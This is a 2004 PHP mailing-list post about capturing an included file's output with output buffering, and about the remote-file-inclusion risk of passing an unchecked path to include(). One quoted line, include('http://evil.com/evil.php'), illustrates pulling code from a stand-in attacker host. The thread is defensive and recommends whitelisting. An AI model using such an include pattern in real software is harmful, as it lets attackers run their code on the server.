[nycphp-talk] parse file, return as string
Tim Gales
tgales at tgaconnect.com
Thu Aug 19 13:28:12 EDT 2004
David Mintz
> Sent: Thursday, August 19, 2004 12:07 PM
> To: NYPHP Talk
> Subject: Re: [nycphp-talk] parse file, return as string
>
>
> On Thu, 19 Aug 2004, inforequest wrote:
>
> > Fan, Wellington wfan-at-VillageVoice.com |nyphp 04/2004| wrote:
> >
> > >ob_start();
> > >@include($path_to_file);
> > >$contents = ob_get_clean();
> > >
> > >
> > be very wary of remote injections with that code.... include will
> > accept a URL in that variable. Explicitly allow
> $path_to_file (is it
> > expected to allways be on *your* domain?).
> >
>
> If you have allow_url_fopen disabled,
> include('http://evil.com/evil.php')
> will fail, right?
allow_url_fopen is a system level configuration
directive and can only be set or unset in php.ini.
(you can't undo the setting dynamically at runtime for
security reasons)
To keep out 'evil.php' you would have to
disallow opening url's anywhere -- if you go
that route.
Like many security 'fixes', this cure
strikes me as worse than the illness.
(I think it would certainly put a damper
on using pcoms for instance)
I believe you are taking a 'blacklist'
approach -- trying to make sure an
'evil.php' doesn't affect you.
You might be better off to take
a 'whitelist' approach like the ones
Chris Shiflett speaks about from time
to time in his security workshops.
T. Gales & Associates
'Helping People Connect with Technology'
http://www.tgaconnect.com
More information about the talk
mailing list